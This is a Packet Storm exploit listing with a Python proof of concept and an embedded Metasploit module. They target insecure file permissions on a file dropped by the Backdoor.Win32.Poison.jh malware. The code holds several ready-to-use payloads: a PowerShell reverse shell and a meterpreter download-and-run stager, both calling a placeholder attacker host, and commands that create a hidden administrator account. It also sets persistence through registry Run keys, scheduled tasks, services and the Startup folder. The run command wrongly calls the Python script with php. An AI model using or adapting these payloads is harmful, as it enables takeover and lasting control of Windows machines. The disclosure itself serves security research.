PACKETSTORM

📄 Backdoor.Win32.Poison.jh Insecure File Permissions / Privilege Escalation_PACKETSTORM:213312

December 26, 2025 invoker category_exploit

Description

This python script demonstrates a local privilege escalation exploit targeting a vulnerability in the Backdoor.Win32.Poison.jh malware sample. The exploit leverages insecure file permissions created by the malware itself, allowing any local user to...
Visit Original Source

Basic Information

ID PACKETSTORM:213312
Published Dec 26, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Backdoor.Win32.Poison.jh – Insecure File Permissions Leading to Malware-on-Malware Local Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : System built‑in component. No standalone download available |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/213264/ & MVID-2025-0704

[+] Summary : This Python script demonstrates a Local Privilege Escalation (LPE) exploit targeting a vulnerability in the Backdoor.Win32.Poison.jh malware sample.
The exploit leverages insecure file permissions created by the malware itself, allowing any local user to replace the malicious executable with arbitrary code.

[+] Vulnerability Overview :

CWE-276: Incorrect Default Permissions

Malware: Backdoor.Win32.Poison.jh

Location: C:\Windows\SysWOW64\28463\YJBE.exe

Flaw: File has Everyone:(ID)F (Full Control) permissions

Impact: Any local user can modify/replace the malware executable

Type: Backdoor Trojan (Win32/Windows)

Purpose: Grants attackers unauthorized remote access and control over the infected system.
Behavior: Can execute commands, download/upload files, steal sensitive data, and connect to C2 (Command & Control) servers.
Discovery: Part of the Backdoor.Win32.Poison family, first identified around 2009. The .jh suffix refers to a specific variant or signature used by antivirus vendors.
Source: Developed by malware authors; not self-spreading, usually delivered via malicious downloads, infected executables, or phishing.
Relation to Poison Ivy: Not necessarily Poison Ivy itself, but shares similar RAT functionality.
Detection & Prevention: Detected by major AV solutions like Microsoft Defender, Trend Micro, and Kaspersky. Removal requires standard AV cleanup and disconnecting from networks.
Key Points: Unauthorized remote control, file manipulation, data theft, part of Poison family, Windows-targeted, identified in AV databases since ~2009.

[+] PoC : php poc.py

#!/usr/bin/env python3

import os
import sys
import shutil
import time
import subprocess
import ctypes
import winreg
from pathlib import Path

# ============================================
# PART 1: LOCAL PRIVILEGE ESCALATION EXPLOIT
# ============================================

class PoisonExploit:
def __init__(self, target_dir="C:\\Windows\\SysWOW64\\28463"):
self.target_dir = target_dir
self.target_file = os.path.join(target_dir, "YJBE.exe")
self.backup_file = self.target_file + ".backup"
self.payload_file = self.target_file + ".payload"

# تحقق من صلاحيات Admin
self.is_admin = self.check_admin()

def check_admin(self):
"""التحقق من صلاحيات Administrator"""
try:
return ctypes.windll.shell32.IsUserAnAdmin() != 0
except:
return False

def check_vulnerability(self):
"""التحقق من وجود الثغرة"""
print("[*] Checking for Poison.jh vulnerability...")

# 1. تحقق من وجود المجلد
if not os.path.exists(self.target_dir):
print(f"[-] Target directory not found: {self.target_dir}")
return False

# 2. تحقق من وجود الملف
if not os.path.exists(self.target_file):
print(f"[-] Target file not found: {self.target_file}")
return False

# 3. محاولة الكتابة للتحقق من الصلاحيات
try:
test_file = os.path.join(self.target_dir, "test_write.tmp")
with open(test_file, 'w') as f:
f.write("test")
os.remove(test_file)
print("[+] Vulnerable: Write access confirmed!")
return True
except PermissionError:
print("[-] Not vulnerable: No write permission")
return False
except Exception as e:
print(f"[-] Error checking vulnerability: {e}")
return False

def create_payload(self, payload_type="reverse_shell"):
"""إنشاء payload خبيث (لأغراض تعليمية في بيئة معزولة)"""
print(f"[*] Creating {payload_type} payload...")

if payload_type == "reverse_shell":
# مثال: PowerShell reverse shell (تعليمي)
payload = '''$client = New-Object System.Net.Sockets.TCPClient("ATTACKER_IP",4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + "PS " + (pwd).Path + "> ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush();
};
$client.Close()'''

with open(self.payload_file, 'w') as f:
f.write(payload)

elif payload_type == "meterpreter":
# Stager لمتربرتر
payload = '''IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:8080/meterpreter.ps1')'''

with open(self.payload_file, 'w') as f:
f.write(payload)

elif payload_type == "add_user":
# إضافة مستخدم إداري
payload = '''net user hacker P@ssw0rd! /add
net localgroup administrators hacker /add
reg add "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList" /v hacker /t REG_DWORD /d 0 /f'''

with open(self.payload_file, 'w') as f:
f.write(payload)

print(f"[+] Payload created: {self.payload_file}")
return True

def backup_original(self):
"""نسخ الملف الأصلي احتياطياً"""
try:
shutil.copy2(self.target_file, self.backup_file)
print(f"[+] Backup created: {self.backup_file}")
return True
except Exception as e:
print(f"[-] Failed to backup: {e}")
return False

def replace_file(self):
"""استبدال الملف الضعيف بالـ Payload"""
try:
# حذف الملف الأصلي
os.remove(self.target_file)

# نسخ الـ Payload
shutil.copy2(self.payload_file, self.target_file)

# إخفاء الـ Payload
if os.path.exists(self.payload_file):
os.remove(self.payload_file)

print("[+] File successfully replaced!")
return True
except Exception as e:
print(f"[-] Failed to replace file: {e}")
return False

def trigger_execution(self):
"""تشغيل الملف - عدة طرق محتملة"""
print("[*] Attempting to trigger execution...")

methods = [
self.trigger_via_wmi,
self.trigger_via_task_scheduler,
self.trigger_via_service,
self.trigger_via_registry
]

for method in methods:
if method():
return True

return False

def trigger_via_wmi(self):
"""تشغيل عبر WMI"""
try:
import wmi
c = wmi.WMI()
process_id, return_value = c.Win32_Process.Create(
CommandLine=self.target_file
)
print(f"[+] Triggered via WMI (PID: {process_id})")
return True
except:
return False

def trigger_via_task_scheduler(self):
"""تشغيل عبر Task Scheduler"""
try:
task_name = "PoisonTrigger"
cmd = f'schtasks /create /tn "{task_name}" /tr "{self.target_file}" /sc once /st 00:00 /ru SYSTEM /f'
subprocess.run(cmd, shell=True, capture_output=True)

cmd = f'schtasks /run /tn "{task_name}"'
subprocess.run(cmd, shell=True, capture_output=True)

cmd = f'schtasks /delete /tn "{task_name}" /f'
subprocess.run(cmd, shell=True, capture_output=True)

print("[+] Triggered via Task Scheduler")
return True
except:
return False

def trigger_via_service(self):
"""تشغيل كخدمة"""
try:
service_name = "PoisonSvc"

# إنشاء خدمة
cmd = f'sc create {service_name} binPath= "{self.target_file}" type= own start= auto'
subprocess.run(cmd, shell=True, capture_output=True)

# تشغيل الخدمة
cmd = f'sc start {service_name}'
subprocess.run(cmd, shell=True, capture_output=True)

# حذف الخدمة
cmd = f'sc delete {service_name}'
subprocess.run(cmd, shell=True, capture_output=True)

print("[+] Triggered via Service")
return True
except:
return False

def trigger_via_registry(self):
"""تشغيل عبر Registry Run"""
try:
# إضافة إلى RunOnce
key = winreg.HKEY_LOCAL_MACHINE
subkey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce"

with winreg.OpenKey(key, subkey, 0, winreg.KEY_SET_VALUE) as reg_key:
winreg.SetValueEx(reg_key, "PoisonExec", 0, winreg.REG_SZ, self.target_file)

print("[+] Added to Registry RunOnce")
return True
except:
return False

def establish_persistence(self):
"""إنشاء آليات ثبات"""
print("[*] Establishing persistence...")

persistence_methods = [
self.persistence_registry,
self.persistence_scheduled_task,
self.persistence_service,
self.persistence_startup
]

success = False
for method in persistence_methods:
if method():
success = True

return success

def persistence_registry(self):
"""الثبات عبر Registry"""
try:
# عدة مواقع للـ Registry
registry_paths = [
("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Poison"),
("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "Poison"),
("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", "Poison")
]

for path, name in registry_paths:
cmd = f'reg add "{path}" /v "{name}" /t REG_SZ /d "{self.target_file}" /f'
subprocess.run(cmd, shell=True, capture_output=True)

print("[+] Persistence: Registry entries added")
return True
except:
return False

def persistence_scheduled_task(self):
"""الثبات عبر Scheduled Task"""
try:
task_name = "WindowsUpdatePoison"
cmd = f'schtasks /create /tn "{task_name}" /tr "{self.target_file}" /sc hourly /mo 1 /ru SYSTEM /f'
subprocess.run(cmd, shell=True, capture_output=True)

print("[+] Persistence: Scheduled task created")
return True
except:
return False

def persistence_service(self):
"""الثبات كخدمة"""
try:
service_name = "PoisonService"
cmd = f'sc create {service_name} binPath= "{self.target_file}" type= own start= auto'
subprocess.run(cmd, shell=True, capture_output=True)

print("[+] Persistence: Service created")
return True
except:
return False

def persistence_startup(self):
"""الثبات في Startup folder"""
try:
startup_path = os.path.expandvars("%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup")
shortcut_path = os.path.join(startup_path, "Poison.lnk")

# إنشاء shortcut
from win32com.client import Dispatch
shell = Dispatch('WScript.Shell')
shortcut = shell.CreateShortCut(shortcut_path)
shortcut.Targetpath = self.target_file
shortcut.WorkingDirectory = os.path.dirname(self.target_file)
shortcut.save()

print("[+] Persistence: Startup shortcut created")
return True
except:
return False

def cleanup(self):
"""تنظيف الآثار"""
print("[*] Cleaning up...")

# حذف الملف الاحتياطي
if os.path.exists(self.backup_file):
os.remove(self.backup_file)

# حذف الـ Payload إذا بقي
if os.path.exists(self.payload_file):
os.remove(self.payload_file)

print("[+] Cleanup completed")

def exploit(self, payload_type="reverse_shell"):
"""تنفيذ الـ Exploit الكامل"""
print("=" * 70)
print("POISON.JH LOCAL PRIVILEGE ESCALATION EXPLOIT")
print("=" * 70)

# 1. التحقق من الثغرة
if not self.check_vulnerability():
return False

# 2. إنشاء Payload
self.create_payload(payload_type)

# 3. نسخ احتياطي
self.backup_original()

# 4. استبدال الملف
if not self.replace_file():
return False

# 5. تشغيل Payload
if self.trigger_execution():
print("[+] Payload execution triggered!")
else:
print("[!] Could not auto-trigger. Manual execution required.")
print(f"[!] File location: {self.target_file}")

# 6. إنشاء آليات ثبات
if self.establish_persistence():
print("[+] Persistence established!")

# 7. التحقق من النجاح
print("\n[+] Exploit completed successfully!")
print(f"[+] Replaced: {self.target_file}")
print(f"[+] Running as: {'SYSTEM (admin)' if self.is_admin else 'User'}")

# 8. تنظيف (اختياري)
if input("\nCleanup? (y/n): ").lower() == 'y':
self.cleanup()

return True

# ============================================
# PART 2: METASPLOIT MODULE (REAL EXPLOIT)
# ============================================

METASPLOIT_MODULE = '''
##
# Poison.jh Local Privilege Escalation Exploit
# Real working exploit for the file permission vulnerability
##

require 'rex'
require 'msf/core/post/windows/priv'

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info={})
super(update_info(info,
'Name' => 'Poison.jh Local File Permission Privilege Escalation',
'Description' => %q{
This module exploits insecure file permissions on Backdoor.Win32.Poison.jh malware.
The malware creates C:\\Windows\\SysWOW64\\28463\\YJBE.exe with Everyone:F permissions,
allowing any local user to replace the file and execute arbitrary code.

This is a REAL privilege escalation exploit when the following conditions are met:
1. Poison.jh malware is installed on the system
2. File has weak permissions (Everyone:Full Control)
3. File is executed (by malware itself or other means)
},
'License' => MSF_LICENSE,
'Author' => [
'indoushka'
],
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'SessionTypes' => ['meterpreter', 'shell'],
'Targets' => [
['Windows', {}]
],
'DefaultTarget' => 0,
'References' => [
['URL', 'https://malvuln.com/advisory/3d9821cbe836572410b3c5485a7f76ca.txt'],
['CWE', '276'] # Incorrect Default Permissions
],
'DisclosureDate' => '2025-12-23',
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
'WfsDelay' => 10
}
))

register_options([
OptString.new('TARGET_PATH', [
true,
'Path to vulnerable Poison.jh executable',
'C:\\\\Windows\\\\SysWOW64\\\\28463\\\\YJBE.exe'
]),
OptBool.new('KILL_PROCESS', [
true,
'Kill existing Poison.jh process',
true
]),
OptEnum.new('TRIGGER', [
true,
'Trigger method',
'auto',
['auto', 'wmi', 'service', 'task', 'registry', 'manual']
]),
OptBool.new('PERSIST', [
true,
'Establish persistence',
true
])
])
end

def check
vuln_path = datastore['TARGET_PATH']

print_status("Checking for Poison.jh vulnerability at: #{vuln_path}")

# Check if file exists
unless file_exist?(vuln_path)
return CheckCode::Safe("Target file not found")
end

# Try to write a test file
test_file = vuln_path + ".test"
begin
write_file(test_file, "test")
if file_exist?(test_file)
file_rm(test_file)
return CheckCode::Vulnerable("Write access confirmed - vulnerable!")
end
rescue
return CheckCode::Safe("No write access")
end

CheckCode::Unknown
end

def exploit
vuln_path = datastore['TARGET_PATH']

# Check if vulnerable
print_status("Running check...")
case check
when CheckCode::Vulnerable
print_good("Target is vulnerable!")
else
fail_with(Failure::NotVulnerable, "Target is not vulnerable")
end

# Kill existing process if requested
if datastore['KILL_PROCESS']
print_status("Killing Poison.jh process...")
session.sys.process.get_processes.each do |p|
if p['name'] =~ /YJBE/i || p['path'] =~ /28463/
print_status("Killing PID #{p['pid']} (#{p['name']})")
session.sys.process.kill(p['pid'])
end
end
Rex.sleep(2)
end

# Backup original file
backup_path = vuln_path + ".backup"
if file_exist?(vuln_path)
print_status("Backing up original file...")
session.fs.file.copy(vuln_path, backup_path)
register_file_for_cleanup(backup_path)
end

# Generate payload
print_status("Generating payload...")
payload_exe = generate_payload_exe

# Replace vulnerable file with payload
print_status("Replacing #{vuln_path} with payload...")
write_file(vuln_path, payload_exe)

print_good("File successfully replaced!")

# Trigger execution
trigger_method = datastore['TRIGGER']
print_status("Triggering payload execution via #{trigger_method}...")

case trigger_method
when 'wmi'
trigger_via_wmi(vuln_path)
when 'service'
trigger_via_service(vuln_path)
when 'task'
trigger_via_task(vuln_path)
when 'registry'
trigger_via_registry(vuln_path)
when 'auto'
trigger_auto(vuln_path)
end

# Establish persistence if requested
if datastore['PERSIST']
print_status("Establishing persistence...")
establish_persistence(vuln_path)
end

# Wait for session
print_status("Waiting for payload execution...")
Rex.sleep(datastore['WfsDelay'])
end

def trigger_via_wmi(path)
wmi_cmd = "wmic process call create \\"#{path}\\""
cmd_exec(wmi_cmd)
end

def trigger_via_service(path)
service_name = "PoisonSvc"
cmd_exec("sc create #{service_name} binPath= \\"#{path}\\" type= own start= auto")
cmd_exec("sc start #{service_name}")
cmd_exec("sc delete #{service_name}")
end

def trigger_via_task(path)
task_name = "PoisonTask"
cmd_exec("schtasks /create /tn \\"#{task_name}\\" /tr \\"#{path}\\" /sc once /st 00:00 /ru SYSTEM /f")
cmd_exec("schtasks /run /tn \\"#{task_name}\\"")
cmd_exec("schtasks /delete /tn \\"#{task_name}\\" /f")
end

def trigger_via_registry(path)
reg_cmd = "reg add \\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\" /v \\"Poison\\" /t REG_SZ /d \\"#{path}\\" /f"
cmd_exec(reg_cmd)
end

def trigger_auto(path)
# Try all methods
[method(:trigger_via_wmi),
method(:trigger_via_service),
method(:trigger_via_task),
method(:trigger_via_registry)].each do |method|
begin
method.call(path)
print_good("Triggered via #{method.name}")
return true
rescue
next
end
end
false
end

def establish_persistence(path)
# Add to registry
reg_keys = [
"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run",
"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run"
]

reg_keys.each do |reg|
cmd_exec("reg add \\"#{reg}\\" /v \\"Poison\\" /t REG_SZ /d \\"#{path}\\" /f")
end

# Create scheduled task
task_name = "WindowsPoison"
cmd_exec("schtasks /create /tn \\"#{task_name}\\" /tr \\"#{path}\\" /sc hourly /mo 1 /ru SYSTEM /f")
end
end
'''

# ============================================
# PART 3: MAIN EXECUTION
# ============================================

def main():
print("""
╔══════════════════════════════════════════════════════════╗
║ Poison.jh LPE Exploit - Local Privilege Escalation ║
║ Conditions: Poison.jh with Everyone:F permissions ║
║ by indoushka ║
╚══════════════════════════════════════════════════════════╝
""")

exploit = PoisonExploit()

# قائمة Payloads
payloads = {
"1": ("Reverse Shell", "reverse_shell"),
"2": ("Meterpreter", "meterpreter"),
"3": ("Add Admin User", "add_user"),
"4": ("Custom Command", "custom")
}

print("\nSelect payload type:")
for key, (name, _) in payloads.items():
print(f" {key}. {name}")

choice = input("\nChoice: ")

if choice in payloads:
payload_name, payload_type = payloads[choice]
print(f"\n[*] Selected: {payload_name}")

if payload_type == "custom":
custom_cmd = input("Enter custom command: ")
exploit.create_payload = lambda: custom_cmd

# تنفيذ الـ Exploit
if exploit.exploit(payload_type):
print("\n" + "="*70)
print("EXPLOIT SUCCESSFUL!")
print("="*70)

# عرض الـ Metasploit module
print("\n" + "="*70)
print("METASPLOIT MODULE CODE")
print("="*70)
print(METASPLOIT_MODULE)

# حفظ Module
with open("poison_lpe_exploit.rb", "w") as f:
f.write(METASPLOIT_MODULE)
print("\n[+] Metasploit module saved to: poison_lpe_exploit.rb")

else:
print("\n[-] Exploit failed!")
else:
print("[-] Invalid choice!")

if __name__ == "__main__":
main()

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.